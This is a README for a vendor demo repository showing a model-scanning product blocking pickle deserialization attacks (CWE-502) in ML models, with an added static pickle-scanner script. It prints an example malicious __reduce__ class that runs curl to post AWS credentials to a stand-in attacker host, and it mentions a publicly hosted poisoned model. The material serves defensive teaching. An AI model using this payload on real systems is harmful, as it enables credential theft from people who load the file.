Interactive demonstration of Prisma AIRS Model Security detecting and blocking pickle deserialization attacks (CWE-502) in ML models.
This repository provides a complete, self-contained Jupyter notebook demonstrating how Prisma AIRS Model Security protects against malicious machine learning models. The demo shows:
- ✅ Baseline scan of a clean model (ALLOWED)
- 🔴 Detection of a poisoned model containing a pickle deserialization exploit (BLOCKED)
- Side-by-side comparison with detailed analysis
- Value proposition and ROI calculation
Attack Vector: Pickle deserialization (CWE-502) - arbitrary code execution during model loading
Demo Time: 5-10 minutes
- Interactive Jupyter Notebook - Live code execution with step-by-step explanations
- Real Attack Simulation - Genuine CWE-502 exploit code (safe demo environment)
- Business Value Metrics - ROI calculation based on industry data
- Educational Content - Technical deep dive into detection mechanisms
- Production-Ready - Can be adapted for CI/CD integration examples
- Python 3.12 or higher
- Prisma AIRS Model Security account
- Service account credentials (Client ID, Client Secret, TSG ID)
- Jupyter Notebook
1. Clone this repository:

   ```bash
   git clone <repository-url>
   cd prisma-airs-pickle-demo
   ```

2. Create and activate a virtual environment:

   ```bash
   python3 -m venv venv
   source venv/bin/activate  # On Windows: venv\Scripts\activate
   ```

3. Install dependencies:

   ```bash
   pip install -r requirements.txt
   ```

4. Set environment variables:

   ```bash
   export MODEL_SECURITY_CLIENT_ID="your-client-id"
   export MODEL_SECURITY_CLIENT_SECRET="your-client-secret"
   export TSG_ID="your-tsg-id"
   ```

   See Getting Credentials below for details.

5. Launch Jupyter:

   ```bash
   jupyter notebook demo.ipynb
   ```
To obtain Prisma AIRS credentials:
- Log in to Strata Cloud Manager: https://strata.paloaltonetworks.com
- Create a Service Account:
  - Navigate to: Settings → Identity & Access → Service Accounts
  - Click "Add Service Account"
  - Name: `Prisma AIRS Demo`
  - Select appropriate permissions
  - Save and copy the Client ID and Client Secret (shown once!)
- Get the TSG ID:
  - Navigate to: Tenant Management
  - Copy your Tenant Service Group (TSG) ID
Scan `amazon/chronos-t5-small`, a legitimate time series forecasting model from Amazon:
- Format: SafeTensors (secure)
- Expected Result: ALLOWED ✅
- Scan Time: ~1 minute
Scan `scthornton/chronos-t5-small-poisoned-demo`, identical to the clean model but with a malicious pickle file added:
- Attack: Pickle deserialization exploit
- Payload: AWS credential theft via curl to C2 server
- Expected Result: BLOCKED 🔴
- Scan Time: ~1 minute
- Side-by-side comparison of results
- Explanation of detection mechanism
- ROI calculation (average data breach: $4.45M)
- Technical deep dive
Python's `pickle` module allows objects to be serialized and deserialized. However, it is unsafe for untrusted data because it can execute arbitrary code during deserialization.

```python
import pickle

class MaliciousCheckpoint:
    def __reduce__(self):
        import os
        return (
            os.system,
            ("curl -X POST https://attacker-c2.com/exfil -d @$HOME/.aws/credentials",)
        )

# When victim loads this:
with open('malicious_checkpoint.pkl', 'rb') as f:
    checkpoint = pickle.load(f)  # <-- CODE EXECUTES HERE
# AWS credentials sent to attacker before user realizes
```

- Automatic Execution: Code runs during `pickle.load()`, before the user can inspect it
- Full System Access: Can execute any system command via `os.system()`
- Credential Theft: Steals AWS credentials, API keys, tokens
- Real-World Threat: Documented in actual ML supply chain attacks
Detection Method: File Format Policy Enforcement
Prisma AIRS blocks the pickle file format itself, not just specific exploits. This is because:
- Pickle is inherently unsafe - Allows arbitrary code execution by design
- Cannot be secured - No way to "safely" load untrusted pickle files
- Zero-trust approach - Block entire format category
Benefits:
- ✅ Cannot be bypassed with sophisticated payloads
- ✅ Blocks entire class of deserialization attacks
- ✅ Simple, fast, reliable
- ✅ No false negatives
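The following script is an added example that mirrors the two ideas above: the `__reduce__` mechanism that makes pickle dangerous, and a file-format policy that blocks the whole format rather than matching specific payloads. It is not the notebook's code and not the Prisma AIRS SDK; `pickle_globals`, `scan_model_dir` and the sample files are this example's own constructions. The inspection uses `pickletools.genops`, which decodes opcodes without ever unpickling, so the callable a payload names (here the harmless `builtins.print`, standing in for `os.system`) is listed rather than executed. The zip handling assumes PyTorch's default `torch.save` layout, a zip archive containing a `data.pkl` member.

```python
"""No-pickle file-format policy for a model directory (added example).

BLOCKED if any pickle stream is present, ALLOWED if only SafeTensors files are
found.  Nothing is unpickled: pickletools.genops walks the opcode stream
statically.  All sample files are constructed in a temporary directory.
"""
import io
import json
import os
import pickle
import pickletools
import struct
import tempfile
import zipfile

# Opcodes that push a str constant; STACK_GLOBAL consumes the last two of them.
_STR_OPS = {"UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}
# Opcodes that construct objects, i.e. where a __reduce__ target would be called.
_CONSTRUCT_OPS = {"REDUCE", "BUILD", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}


def pickle_globals(data: bytes):
    """Return (is_pickle, imported_globals, construct_op_count).

    Bytes count as a pickle only if every opcode decodes up to a STOP.
    imported_globals lists "module.name" references (GLOBAL / STACK_GLOBAL).
    """
    imported, strings, constructs = [], [], 0
    try:
        for op, arg, _pos in pickletools.genops(io.BytesIO(data)):
            if op.name in _STR_OPS:
                strings.append(arg)
            elif op.name == "GLOBAL":          # protocols 0-3: arg is "module name"
                imported.append(arg.replace(" ", ".", 1))
            elif op.name == "STACK_GLOBAL" and len(strings) >= 2:  # protocol 4+
                imported.append(f"{strings[-2]}.{strings[-1]}")
            elif op.name in _CONSTRUCT_OPS:
                constructs += 1
    except Exception:                          # unknown opcode, truncated stream, etc.
        return False, [], 0
    return True, imported, constructs


def _file_streams(path: str):
    """Yield (label, bytes) for a file, descending into zip members
    (assumed torch.save layout: a zip archive holding data.pkl)."""
    if zipfile.is_zipfile(path):
        with zipfile.ZipFile(path) as zf:
            for name in zf.namelist():
                yield f"{path}!{name}", zf.read(name)
    else:
        with open(path, "rb") as fh:
            yield path, fh.read()


def scan_model_dir(root: str) -> dict:
    """Apply the policy: any pickle stream under root means BLOCKED."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in sorted(files):
            for label, data in _file_streams(os.path.join(dirpath, fname)):
                is_pkl, imported, constructs = pickle_globals(data)
                if is_pkl:
                    findings.append({"file": os.path.relpath(label, root),
                                     "imports": imported,          # for the analyst
                                     "construct_ops": constructs})
    return {"verdict": "BLOCKED" if findings else "ALLOWED", "findings": findings}


class _DemoPayload:
    """Constructed stand-in for a malicious checkpoint: __reduce__ names a
    callable that pickle.load would invoke (builtins.print here)."""
    def __reduce__(self):
        return (print, ("constructed demo payload",))


def write_safetensors(path: str) -> None:
    """Write a minimal valid SafeTensors file: 8-byte LE header length, JSON header, data."""
    header = json.dumps({"weight": {"dtype": "F32", "shape": [2], "data_offsets": [0, 8]}}).encode()
    with open(path, "wb") as fh:
        fh.write(struct.pack("<Q", len(header)) + header + b"\x00" * 8)


def build_demo_dirs():
    """Create constructed 'clean' and 'poisoned' model directories; return their paths."""
    base = tempfile.mkdtemp(prefix="pickle-policy-demo-")
    clean, poisoned = os.path.join(base, "clean"), os.path.join(base, "poisoned")
    for d in (clean, poisoned):
        os.makedirs(d)
        write_safetensors(os.path.join(d, "model.safetensors"))
    with open(os.path.join(poisoned, "checkpoint.pkl"), "wb") as fh:
        pickle.dump(_DemoPayload(), fh)        # serialising does not call the target
    return clean, poisoned


def run_demo() -> dict:
    """Scan both constructed directories and return {'clean': ..., 'poisoned': ...}."""
    clean, poisoned = build_demo_dirs()
    return {"clean": scan_model_dir(clean), "poisoned": scan_model_dir(poisoned)}


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

The verdict depends only on whether a pickle stream exists, not on which globals it imports; the `imports` list is reported so an analyst can see what `pickle.load` would have called, which is the point of enforcing the format policy instead of signature-matching individual payloads.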
```
prisma-airs-pickle-demo/
├── README.md                  # This file
├── demo.ipynb                 # Main Jupyter notebook demo
├── requirements.txt           # Python dependencies
├── LICENSE                    # MIT License
├── .gitignore                 # Git ignore rules
├── SECURITY.md                # Security policy
├── CONTRIBUTING.md            # Contribution guidelines
└── docs/
    ├── SETUP.md               # Detailed setup instructions
    ├── TROUBLESHOOTING.md     # Common issues and solutions
    └── TECHNICAL_ANALYSIS.md  # In-depth technical analysis
```
- Setup Guide - Detailed installation and configuration
- Troubleshooting - Common issues and solutions
- Technical Analysis - Deep dive into detection mechanisms
- Demonstrate ML supply chain security risks to stakeholders
- Educate developers on pickle deserialization threats
- Validate security controls before model deployment
- Create security awareness training materials
- Live product demonstrations
- Customer proof-of-concept
- ROI justification
- Competitive differentiation
- Learn about ML security best practices
- Understand CWE-502 vulnerabilities
- See Prisma AIRS SDK integration examples
- Adapt for CI/CD pipeline integration
Without Prisma AIRS:
- Malicious models deployed to production
- Credential theft, data exfiltration, ransomware
- Average data breach cost: $4.45M (IBM, 2024)
With Prisma AIRS:
- Models scanned before deployment
- Pickle attacks blocked automatically
- Attack prevented at $0 cost
ROI: One blocked pickle attack pays for Prisma AIRS 10x over
- Models used in this demo are for educational purposes only
- The malicious model is hosted publicly to demonstrate detection
- Do NOT use these techniques against systems you don't own
- See SECURITY.md for our security policy
We welcome contributions! Please see CONTRIBUTING.md for guidelines.
This project is licensed under the MIT License - see LICENSE file for details.
- Documentation: https://docs.paloaltonetworks.com/prisma/prisma-airs
- Issues: Please open a GitHub issue for bugs or feature requests
- Community: Join the discussion in GitHub Discussions
- Palo Alto Networks - For Prisma AIRS Model Security
- Amazon - For the chronos-t5-small base model
- HuggingFace - For model hosting infrastructure
- OWASP Top 10 for LLM Applications
- CWE-502: Deserialization of Untrusted Data
- Prisma AIRS Documentation
- ML Supply Chain Security Best Practices
- Version: 1.0.0
- Last Updated: 2025-10-28
- Maintained By: Palo Alto Networks Prisma AIRS Team